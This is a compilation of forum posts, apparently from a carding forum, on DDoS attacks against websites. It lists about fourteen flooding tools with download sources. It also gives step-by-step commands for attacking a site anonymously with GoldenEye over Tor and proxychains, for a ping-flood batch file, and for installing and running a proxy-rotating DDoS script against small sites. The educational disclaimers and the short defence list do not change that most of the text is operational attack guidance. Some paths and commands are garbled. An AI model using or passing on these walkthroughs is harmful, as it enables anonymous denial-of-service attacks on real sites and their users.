DDoS attack methods on the site

[Carder]

All information on the channel is provided solely for informational / educational purposes.

DDOS attack methods:

There are three different methods of organizing DDoS attacks.

By bandwidth - this type of attack assumes that a large number of requests are sent to a website using the TCP, UDP and ICMP protocols and thus completely fill its bandwidth. While causing denial of service.

Server protocol-based - this type of attack is aimed at specific server services. And can be done using TCP, UDP and ICMP. Such attacks are often called SYN floods, the meaning of which is to send a large number of SYN requests to the web server to which the server must respond with an ASK request. Due to the large flood of such requests, the server often cannot cope with the load and crashes.

Based on the errors of a specific website - this type of attack is the most difficult to execute and is usually used by highly professional hackers. Its essence lies in the fact that there are vulnerabilities on the victim site, using which a high load on the server is created and it receives a denial of service.

DoS & DDoS tools

1. Kali Linux​

There are hundreds of programs available on the net to perform DDoS attacks. The first place where we can find such tools is the hacker Kali Linux distribution. Opening the following path in it:

kali> cd / usr / share / metasplot-framework / auxiliary / dos

and looking at the contents of the directory, we will see that Metasploit has many tools for organizing DDoS attacks.

We'll also find hundreds of DDOS programs in the distribution's Exploit Database and at Exploit-DB.com.

You can view a listing of available tools for DDOS attacks in KALI by running the command:

kali> / usr / share / exploitdb / platforms / windows / dos

This command shows a database of exploits for attacking Windows systems.

To view the available Linux DDoS attack tools, enter the command:

/ usr / share / exploitdb / platforms / Linux / dos.

2. LOIC​

The Low Orbit Ion Cannon (LOIC) Low Orbit Ion Cannon. Perhaps the most popular DDOS program. It can send mass requests via ICMP protocols, UDP thereby clogging the channel to the victim's server. The most famous LOIC attack was carried out by the Anonymous group in 2009 and directed against PayPal, Visa, MasterCard in retaliation for disconnecting WikiLeaks from the donation system.

Attacks organized using LOIC can be disposed of by blocking UDP and ICMP packets on the network equipment of Internet providers. You can download LOIC itself for free at SourceForge. This tool is based on Windows and working with it is very simple, specify the victim's sites and press just one button.

2. HOIC​

HOIC was developed during Operation Payback by Praetox by the same team that created LOIC. The key difference is that HOIC uses the HTTP protocol and uses it to send a stream of randomized HTTP GET and POST requests. It is capable of simultaneously attacking 256 domains. You can download it from SourceForge.

3. XOIC​

XOIC is another very simple DDOS tool. The user just needs to set the victim's IP address, select the protocol (HTTP, UDP, ICMP, or TCP), and pull the trigger! You can download it from SourceForge

5. HULK​

HTTP Unbearable Load King or HULK is another program that can crash your server. This system uses various techniques to bypass protection, which adds problems to system administrators. You can download this DDOS program on the Packet Storm website.

6. UDP Flooder​

UDP Flooder lives up to its name - a tool designed to send multiple UDP packets to a target. UDP Flooder is often used in DDOS attacks on game servers to disconnect players from the server. The program is available for download at SourceForge.

7. RUDY​

RU-Dead-Yet, or RUDY, takes a different approach to executing DDoS attacks on Internet sites. The program allows you to select a form on the target site and send arbitrary data to this form using POST requests. You can download the program here Hybrid Security.

8. ToR's Hammer​

ToR's Hammer was created to work over the TOR network, with the aim of achieving greater anonymity for the attacker. The problem with this tool is that the TOR network is quite slow and thus reduces the effectiveness of the DDOS attack. You can download this DDOS program from Packet Storm or SourceForge.

9. Pyloris​

Pyloris is another DDoS tool that takes a new approach. It allows an attacker to create their own unique HTTP request. The program will then try to keep the TCP connection open with such requests, thereby reducing the number of available connections on the server. When the server's connection limit comes to an end, the server can no longer serve connections and the site becomes unavailable. This tool is available free of charge from the SourceForge website.

10. OWASP Switchblade​

The Open Web Application Security Project (OWASP) and ProactiveRISK have developed the Switchblade DoS tool for testing web applications for DDoS attack resistance. It has three modes of operation: 1. SSL Half-Open, 2. HTTP Post, and 3. Slowloris. You can download for review from the OWASP website.

11. DAVOSET​

DAVOSET (DDoS attacks via other sites execution tool) is a DDoS program written in Perl that uses remote zombie computers to launch attacks. Using Abuse of Functionality and XML External Entities vulnerabilities, DAVOSET infects remote systems and creates its own "zombie" network. This attack affects 160 different services. This makes it possible to create an impressive network and attack targeted sites. The source code and the program itself can be downloaded from Packet Storm or GitHub.

12. GoldenEye HTTP DoS Tool​

GoldenEye is a simple DoS tool that loads a remote HTTP server with requests and tries to seize all available connections. This is an excellent tool for load testing of a Web site at the stage of implementation, but, according to experts from antiddos.biz, it is absolutely useless in real conditions. And can be filtered with a simple script on the server. You can download the source codes and the program itself from GitHub.

13.THC-SSL-DOS​

This program for DDOS (comes with Kali) and differs from most DDOS tools in that it does not use the bandwidth of the Internet channel and can be used from one computer. THC-SSL-DOS exploits the SSL protocol vulnerability and is capable of "killing" the target server. Unless, of course, this vulnerability exists on it. You can download the program from the THC website, or use KALI Linux where this tool is already installed.

14. DDOSIM - Layer 7 DDoS emulator​

This tool created by Storm Security simulates a DDoS attack from multiple zombie computers with random IP addresses. It creates TCP connections (SYN-SYN / ACK-ACK). The program runs on the application layer (layer 7), which is not common enough. It is also capable of simulating various types of SMTP and TCP floods on various ports. The program will be very useful for load testing the server. You can download it from the SourceForge website.

 

[Carding 4 Carders]

DDOS a site anonymously using Kali Linux tools​

DDOS tools can load large loads on HTTP servers and bring THEM to their knees, running out of resources.

What is a DDOS attack?
A type of attack in which multiple compromised systems attack a single target, which prohibits legitimate users of the target system from accessing the service.
In this Kali Linux tutorial, we will discuss performing a DDOS attack with Kali Linux.

Required tools

1. EtherApe is a graphical network monitor that graphically displays network activity. Hosts and links change in size with traffic. Colored protocols are displayed.
2. Tor - Tor allows clients and relays to offer hidden services. That is, you can offer a web server, SSH server, etc. Without revealing your IP address to your users.
3. Proxychains – the Latest version of Proxychains supports the SOCKS5, SOCKS4, and HTTP CONNECT proxy servers. Proxychains can be mixed with different proxy types.
4. GoldenEye is a Python GoldenEye application designed for security testing.

How to perform a DDOS attack on a website

Step 1: Launch etherape:

root @ kali: ~ # etherape
 
it will offer a popup that graphically displays the network activity.
 
Step 2: Start the TOR service:
 
root @ kali: ~ # service tor start

Step 3: Download Goldeneye https://github.com/jseidl/GoldenEye

root @ kali: ~ # wget https://github.com/jseidl/GoldenEye

Step 4: once downloaded, Unzip it

root @ kali: ~ # unzip GoldenEye-master.zip

Step 5: Launch the attack

root@kali:~/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com

If you encounter runtime issues or other compatibility issues, feel free to comment.

General protection against DDOS attacks

• Reduced IP connection speed.
• Use IDS,web application firewalls.
• Tweak Connection for the IP threshold.
• Use of hosting services that offer the "site protection from hacking service"

Note: Information for research, training, or auditing purposes.

 

[Carding 4 Carders]

We carry out a DDOS attack via CMD

Someone has already understood which team will be discussed. Of course, the ping command in cmd is not used for such manipulations and this method will raise doubts for some, but I want to note that this method is on par with the tools for Kali and termux, but it is much simpler. If you need to check your site and do not want to install questionable software or various distributions, then this method is for you.

1. Open notepad and write a command there

@echo on
 start ping (your site or IP) -n 60 -l 5000
-n time -l number of packets to send

2. Save the notebook and change its name to cmd.bat

3. Then open the cmd.bat file and make sure that the sending of packets has gone,

Now we make our attack effective

We go into our file using notepad and enter the command

start ping (your site or IP) -n 60 -l 5000

Unlimited number of times.
As I said above, it is this manipulation that makes the ping command a command to carry out an attack.
When finished, press ctr + c to close all console windows.

 

[BadB]

DDoS to sites using proxy
Hello everyone! In short, this program is in python, which allows you to ddos sites using a proxy. It is clear that you will not bother VK or Facebook in this way, but some small site - calmly!

Let's update the packages:

apt update && apt upgrade -y

Downloading git and python:

apt install python git -y

Let's install some of the packages we need:

pkg install libxml2 libxslt

You need to download the libraries:

pip install bs4 colorama requests threading lxml

Now the script itself:
git clone https://github.com/kitasS/DuDDos

Open the folder with it:

cd DuDDos

And like this we run:

python DuDDos.py

A little about the script
You must enter into the script:
• Site URL (Required with http / https! For example: https://vk.com)
• Number of streams (The more, the more powerful the DDoS)
• File name with proxy
You may have to wait a bit for all streams to start if your device is not the most powerful.
By standard, the program parses the last 30 proxies from the foxtools site, but you can create a .txt file yourself in the project folder, where you need to place the proxy as follows:

If you can't send a request from the proxy or it gets into the site's banlist, then the stream is automatically switched to the new proxy.
Also, the program takes a random User-Agent for each thread. In short, this thing carries information about the user when he visits the site, that is: browser, OS, bit width and other information.